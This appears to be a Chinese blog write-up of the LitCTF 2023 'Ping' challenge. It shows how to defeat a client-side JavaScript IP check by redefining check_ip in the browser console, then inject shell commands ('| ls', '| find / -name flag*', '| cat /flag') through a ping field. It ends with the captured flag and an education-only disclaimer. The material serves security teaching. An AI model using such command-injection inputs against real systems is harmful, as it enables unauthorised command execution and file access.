[LitCTF 2023]Ping Writeup
看看能PING出什么
Flag形式 NSSCTF{}
出题人 Headlight
解法
试着Ping一下。原来是直接执行 ping 指令。
尝试发送:
| ls
会校验输入是否是 IP 地址。
查看源代码,原来是用 JavaScript 实现的。
如果校验通过就返回 true。
function check_ip(){
let ip = document.getElementById('command').value;
let re = /^(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)$/;
if(re.test(ip.trim())){
return true;
}
alert('敢于尝试已经是很厉害了,如果是这样的话,就只能输入ip哦');
return false;
}
修改 check_ip 函数,让其直接返回 true。在控制台执行:
function check_ip() { return true; }
发送:
| ls
成功跳过校验。
找找 flag 在哪里。
| find / -name flag*
找到了。
让我看看!
| cat /flag
Flag
NSSCTF{6e554d11-1c64-4cb2-8413-24e5ded97bff}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。